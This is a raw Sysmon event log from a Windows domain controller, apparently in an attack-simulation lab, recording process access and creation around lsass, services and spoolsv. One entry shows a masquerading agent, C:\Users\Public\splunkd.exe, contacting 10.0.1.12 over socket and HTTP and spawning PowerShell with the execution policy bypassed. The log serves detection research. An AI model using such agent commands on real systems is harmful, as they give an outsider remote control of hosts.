Files\Amazon\XenTools\LiteAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2C00-00000000AE01}2916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.049{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.049{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.049{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.049{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.049{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.049{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.049{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.049{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.033{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-2E00-00000000AE01}3028C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.033{266CAFBE-646A-6064-0A00-00000000AE01}840920C:\Windows\system32\services.exe{266CAFBE-647D-6064-2E00-00000000AE01}3028C:\Program 
Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.031{266CAFBE-647D-6064-2E00-00000000AE01}3028C:\Program Files\Amazon\XenTools\LiteAgent.exe1.0xenagentXENIFACEAmazon Inc.xenagent.exe"C:\Program Files\Amazon\XenTools\LiteAgent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.022{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.022{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.005{266CAFBE-6473-6064-2600-00000000AE01}30602196C:\Windows\system32\conhost.exe{266CAFBE-647C-6064-2C00-00000000AE01}2916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.002{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647C-6064-2C00-00000000AE01}2916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.002{266CAFBE-6473-6064-2500-00000000AE01}30522412C:\Users\Public\splunkd.exe{266CAFBE-647C-6064-2C00-00000000AE01}2916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Users\Public\splunkd.exe+5c36e 154100x80000000000000001608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.998{266CAFBE-647C-6064-2C00-00000000AE01}2916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -ExecutionPolicy Bypass -C wtpdjlC:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6473-6064-2500-00000000AE01}3052C:\Users\Public\splunkd.exe"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp 17141700x80000000000000001607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:01.000{266CAFBE-647C-6064-2B00-00000000AE01}2536\Winsock2\CatalogChangeListener-9e8-0C:\Windows\System32\spoolsv.exe 10341000x80000000000000001606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.996{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:00.996{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.988{266CAFBE-646A-6064-0A00-00000000AE01}840900C:\Windows\system32\services.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:00.976{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.975{266CAFBE-646A-6064-0A00-00000000AE01}8401092C:\Windows\system32\services.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.960{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe10.0.14393.4169 (rs1_release.210107-1130)Spooler SubSystem AppMicrosoft® Windows® Operating SystemMicrosoft Corporationspoolsv.exeC:\Windows\System32\spoolsv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=87E844BD124333302C9DCF947D98B3A3,SHA256=4C3316B6F7671B2E859B2BC98702C7973FB9BC7A6EA71EDB6ACDFE2CF23EB7A0,IMPHASH=A40033EBEE6E37CE4B1D96B817E1BCC7{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:00.955{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.955{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.955{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 